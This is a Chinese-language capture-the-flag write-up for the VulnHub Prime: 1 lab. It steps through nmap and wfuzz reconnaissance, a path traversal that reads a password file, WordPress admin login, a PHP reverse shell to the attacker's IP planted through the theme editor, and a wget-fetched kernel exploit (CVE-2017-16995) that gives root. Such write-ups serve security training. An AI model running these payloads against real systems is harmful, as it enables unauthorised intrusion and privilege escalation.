Prime1

靶机地址：https://download.vulnhub.com/prime/Prime_Series_Level-1.rar

## 信息搜集

1、确认目标地址。

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sn 192.168.186.0/24                         
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-08 07:26 EDT
Nmap scan report for 192.168.186.1 (192.168.186.1)
Host is up (0.00050s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.186.2 (192.168.186.2)
Host is up (0.00015s latency).
MAC Address: 00:50:56:EC:88:83 (VMware)
Nmap scan report for 192.168.186.134 (192.168.186.134)
Host is up (0.00020s latency).
MAC Address: 00:0C:29:C2:9C:9F (VMware)
Nmap scan report for 192.168.186.254 (192.168.186.254)
Host is up (0.00013s latency).
MAC Address: 00:50:56:E6:44:83 (VMware)
Nmap scan report for 192.168.186.128 (192.168.186.128)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.93 seconds

```

目标靶机地址为192.168.186.134。

2、扫描目标靶机开放的端口。

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.186.134     
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-08 07:28 EDT
Nmap scan report for 192.168.186.134 (192.168.186.134)
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:C2:9C:9F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.74 seconds

```

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.168.186.134
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-08 07:28 EDT
Warning: 192.168.186.134 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.186.134 (192.168.186.134)
Host is up (0.00066s latency).
All 65535 scanned ports on 192.168.186.134 (192.168.186.134) are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:C2:9C:9F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.98 seconds

```

只开放了22与80端口。

3、服务版本、基础脚本、操作系统探测。

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.186.134          
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-08 07:31 EDT
Nmap scan report for 192.168.186.134 (192.168.186.134)
Host is up (0.00036s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: HacknPentest
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:C2:9C:9F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.86 seconds

```

4、使用默认脚本进行扫描。

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap --script=vuln -p22,80 192.168.186.134          
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-08 07:29 EDT
Nmap scan report for 192.168.186.134 (192.168.186.134)
Host is up (0.00023s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: Wordpress login page.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
MAC Address: 00:0C:29:C2:9C:9F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 321.35 seconds

```

## 80端口

![image-20251008193350459](https://oss.maolin101.com/image-20251008193350459.png-101.webp)

> 目录扫描

![image-20251008193740147](https://oss.maolin101.com/image-20251008193740147.png-101.webp)

发现该网站下存在wordpress站点。

![image-20251008193924385](https://oss.maolin101.com/image-20251008193924385.png-101.webp)

> dev目录

![image-20251008193817375](https://oss.maolin101.com/image-20251008193817375.png-101.webp)

大致意识为对于当前web还值得深挖。

> 对于目录扫描，加参数，指定.zip,.txt

```bash
┌──(kali㉿kali)-[~/Desktop/bj]
└─$ dirb http://192.168.186.134/ -X .zip,.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Oct  8 07:44:53 2025
URL_BASE: http://192.168.186.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.zip,.txt) | (.zip)(.txt) [NUM = 2]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.186.134/ ----
+ http://192.168.186.134/secret.txt (CODE:200|SIZE:412)                                                                                                                                                                                 
                                                                                                                                                                                                                                        
-----------------
END_TIME: Wed Oct  8 07:44:59 2025
DOWNLOADED: 9224 - FOUND: 1

```

![image-20251008194539467](https://oss.maolin101.com/image-20251008194539467.png-101.webp)

大致意思是对已经找到的php文件进行fuzz（模糊测试），找到关键的参数且查看location.txt。

> 再次指定为php文件。

```bash
┌──(kali㉿kali)-[~/Desktop/bj]
└─$ dirb http://192.168.186.134/ -X .php -o php.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: php.txt
START_TIME: Wed Oct  8 07:53:49 2025
URL_BASE: http://192.168.186.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.186.134/ ----
+ http://192.168.186.134/image.php (CODE:200|SIZE:147)                                                                                                                                                                                  
+ http://192.168.186.134/index.php (CODE:200|SIZE:136)                                                                                                                                                                                  
                                                                                                                                                                                                                                        
-----------------
END_TIME: Wed Oct  8 07:53:52 2025
DOWNLOADED: 4612 - FOUND: 2

```

> 对找到的php文件进行模糊测试，寻找正确的参数

地址：https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web

默认的用法是：

```bash
 wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 http://website.com/secret.php?FUZZ=something
```

修改后：

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo  wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 147 http://192.168.186.134/image.php?FUZZ=123213   
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.186.134/image.php?FUZZ=123213
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                 
=====================================================================

Total time: 0.395931
Processed Requests: 951
Filtered Requests: 951
Requests/sec.: 2401.929

```

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$  wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.186.134/index.php?FUZZ=something
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.186.134/index.php?FUZZ=something
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                 
=====================================================================

000000341:   200        7 L      19 W       206 Ch      "file"

Total time: 0
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 0

```

找到参数“file”，对index.php文件进行传参数file。

![image-20251008200435640](https://oss.maolin101.com/image-20251008200435640.png-101.webp)

显示我们找错了文件，在前面我们发现secret.txt文件提示我们要查看location.txt文件,对file参数传入值。

![image-20251008201022281](https://oss.maolin101.com/image-20251008201022281.png-101.webp)

```txt
ok well Now you reah at the exact parameter

Now dig some more for next one
use 'secrettier360' parameter on some other php page for more fun. 
```

在其他php页面使用secrettier360参数，也就是image.php。

> 对image.php文件传入参数

![image-20251008201222349](https://oss.maolin101.com/image-20251008201222349.png-101.webp)

得到了正确的参数，然后呢？

> 思考

正确的参数有了，那么哪些漏洞可以利用参数进行传参？==>目录遍历

![image-20251008201409903](https://oss.maolin101.com/image-20251008201409903.png-101.webp)

查看网页源码

![image-20251008201506218](https://oss.maolin101.com/image-20251008201506218.png-101.webp)

提示在/home/saket目录下有一个password.txt文件。

```txt
/home/saket/password.txt
```

![image-20251008203347813](https://oss.maolin101.com/image-20251008203347813.png-101.webp)

内容是：

```txt
follow_the_ippsec
```

猜测会是root、saket、victor的ssh连接密码吗？

经过测试都不是，那么就只要一种可能，是wordpress的账户的密码。

> wordpress

![image-20251008203640299](https://oss.maolin101.com/image-20251008203640299.png-101.webp)

发现作者名为victor，故进入wordpress默认的登录页面尝试登录，账户名为victor，密码为follow_the_ippsec。

登录成功

![image-20251008203812076](https://oss.maolin101.com/image-20251008203812076.png-101.webp)

> 检测是否可以通过上传插件的方式getshell

上传插件：自己制作的空压缩包插件

```bash
┌──(kali㉿kali)-[~/Desktop/bj]
└─$ echo "Hello" > shell.txt                                    
                                                                                                                                                                                                                                         
┌──(kali㉿kali)-[~/Desktop/bj]
└─$ zip shell ./shell.txt 
  adding: shell.txt (stored 0%)
                                                                                                                                                                                                                                         
┌──(kali㉿kali)-[~/Desktop/bj]
└─$ ls            
dirb.txt  php.txt  shell.txt  shell.zip

```

上传zip，上传后点击安装【Install Now】

![image-20251008204423698](https://oss.maolin101.com/image-20251008204423698.png-101.webp)

![image-20251008204515510](https://oss.maolin101.com/image-20251008204515510.png-101.webp)

发现可能没有写入权限。

> 通过主题编辑器，寻找有写入权限的php文件，进行反弹shell

最终发现secret.php文件可以去更新文件的内容且是php文件。

![image-20251008205318489](https://oss.maolin101.com/image-20251008205318489.png-101.webp)

首先去更新文件内容，发现更新成功。

![image-20251008205914126](https://oss.maolin101.com/image-20251008205914126.png-101.webp)

再找到文件的路径，通过当前路径猜测目标文件的地址。

```bash
http://192.168.186.134/wordpress/wp-admin/theme-editor.php?file=secret.php&theme=twentynineteen
```

根据wordpress的特性，那么secret.php的文件位置：

```bash
http://192.168.186.134/wordpress/wp-content/themes/twentynineteen/secret.php
```

![image-20251008205929908](https://oss.maolin101.com/image-20251008205929908.png-101.webp)

> 构造反弹shell

php代码：

```bash
<?php exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.186.128/443 0>&1'"); ?>
```

![image-20251008210741947](https://oss.maolin101.com/image-20251008210741947.png-101.webp)

kali机器进行监听：

```bash
sudo nc -lnvp 443 
```

访问目标文件，php中的exec函数运行，反弹shell成功。

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nc -lnvp 443
listening on [any] 443 ...
connect to [192.168.186.128] from (UNKNOWN) [192.168.186.134] 46426
bash: cannot set terminal process group (1403): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ whoami
<ml/wordpress/wp-content/themes/twentynineteen$ whoami                       
www-data
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$

```

## 提权

```bash
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l                      
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$

```

> 查看home目录

```bash
www-data@ubuntu:/home$ ls
ls
saket
victor
www-data@ubuntu:/home$ cd victor
cd victor
www-data@ubuntu:/home/victor$ ls
ls
ls: cannot open directory '.': Permission denied
www-data@ubuntu:/home/victor$ cd ^H
cd 
bash: cd: HOME not set
www-data@ubuntu:/home/victor$ cd ..
cd ..
www-data@ubuntu:/home$ cd saket
cd saket
www-data@ubuntu:/home/saket$ ls
ls
enc
password.txt
user.txt
www-data@ubuntu:/home/saket$ cat user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ cat password.txt
cat password.txt
follow_the_ippsec
www-data@ubuntu:/home/saket$ cd enc
cd enc
bash: cd: enc: Not a directory
www-data@ubuntu:/home/saket$ cat enc
cat enc
cat: enc: Permission denied
www-data@ubuntu:/home/saket$

```

> 查看内核

```bash
www-data@ubuntu:/home/saket$ uname -a
uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

```

> 搜索 ubuntu 4.10.0 有无相关提权漏洞

![image-20251008211347460](https://oss.maolin101.com/image-20251008211347460.png-101.webp)

第二条为本地提权：

```bash
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation    | linux/local/45010.c
```

下载到当前路径中，进行查看。

```bash
┌──(kali㉿kali)-[~/Desktop/bj]
└─$ searchsploit -m 45010     
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
    Codes: CVE-2017-16995
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/bj/45010.c
```

查看源文件后，编译后直接运行即可。

```bash
gcc cve-2017-16995.c -o cve-2017-16995                                                                                                                                                                                                 
internet@client:~/cve-2017-16995$ ./cve-2017-16995  
```

> 通过python运行临时web服务器将文件传递到靶机

语法：

```bash
python -m http.server [端口号]  #使用默认端口8000
```

```bash
┌──(kali㉿kali)-[~/Desktop/bj]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

```

靶机中执行wget，进行获取

```bash
wget http://192.168.186.128:8000/45010.c
```

```bash
www-data@ubuntu:/tmp$ wget http://192.168.186.128:8000/45010.c
--2025-10-08 06:21:07--  http://192.168.186.128:8000/45010.c
Connecting to 192.168.186.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-csrc]
Saving to: '45010.c'

0K .......... ..                                         100% 54.8M=0s

2025-10-08 06:21:07 (54.8 MB/s) - '45010.c' saved [13176/13176]

www-data@ubuntu:/tmp$ ls
45010.c
www-data@ubuntu:/tmp$

```

查看有无执行权限。

```bash
www-data@ubuntu:/tmp$ ls -liah
791568 -rw-r--r--  1 www-data www-data  13K Oct  8 06:15 45010.c
```

赋予执行权限。

```bash
www-data@ubuntu:/tmp$ chmod +x 45010.c
www-data@ubuntu:/tmp$ ls -liah
791568 -rwxr-xr-x  1 www-data www-data  13K Oct  8 06:15 45010.c
```

进行编译：

```bash
www-data@ubuntu:/tmp$ gcc 45010.c -o shell
www-data@ubuntu:/tmp$ ls -liah
791568 -rwxr-xr-x  1 www-data www-data  13K Oct  8 06:15 45010.c
791576 -rwxr-xr-x  1 www-data www-data  18K Oct  8 06:23 shell
```

执行运行shell

```bash
www-data@ubuntu:/tmp$ ./shell
./shell
whoami
root

```

但当前的shell并不是完整的shell，查看是否存在python环境。

```bash
dpkg -l | python
```

- dpkg -l 是一个用于列出系统中已安装的软件包信息的命令。

发现存在python文件，故使用python语法获取完整的bash。

```python
python -c "import pty;pty.spawn('/bin/bash')"
```

```bash
www-data@ubuntu:/tmp$ ./shell
./shell
whoami
root
python -c "import pty;pty.spawn('/bin/bash')"
root@ubuntu:/tmp# whoami
whoami
root

```

```bash
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls -liah
ls -liah
total 92K
917506 drwx------  5 root root 4.0K Aug 31  2019 .
     2 drwxr-xr-x 24 root root 4.0K Aug 29  2019 ..
964588 -rw-------  1 root root 8.4K Sep  1  2019 .bash_history
917598 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
917597 drwx------  3 root root 4.0K Aug 30  2019 .cache
969791 -rw-------  1 root root  137 Aug 30  2019 .mysql_history
964098 drwxr-xr-x  2 root root 4.0K Aug 29  2019 .nano
917599 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
969796 -rw-r--r--  1 root root   66 Aug 31  2019 .selected_editor
969793 -rwxr-xr-x  1 root root  14K Aug 30  2019 enc
969795 -rw-r--r--  1 root root  305 Aug 30  2019 enc.cpp
969797 -rw-r--r--  1 root root  237 Aug 30  2019 enc.txt
969798 -rw-r--r--  1 root root  123 Aug 30  2019 key.txt
969794 -rw-r--r--  1 root root   33 Aug 30  2019 root.txt
969780 -rw-r--r--  1 root root  805 Aug 30  2019 sql.py
969790 -rwxr-xr-x  1 root root  442 Aug 31  2019 t.sh
964589 drwxr-xr-x 10 root root 4.0K Aug 30  2019 wfuzz
964464 -rw-r--r--  1 root root  170 Aug 29  2019 wordpress.sql
root@ubuntu:/root# cat root.txt
cat root.txt
b2b17036da1de94cfb024540a8e7075a

```

## python获取完整的bash环境

```bash
python -c "import pty;pty.spawn('/bin/bash')"
```

命令解析：

```txt
python -c：执行后续的单行 Python 代码。
import pty：导入 Python 内置的 pty 模块（伪终端模块），该模块用于创建伪终端会话，模拟真实终端环境。
pty.spawn('/bin/bash')：通过 pty 模块启动 /bin/bash 进程，并将其与伪终端绑定，生成一个交互式 shell。
```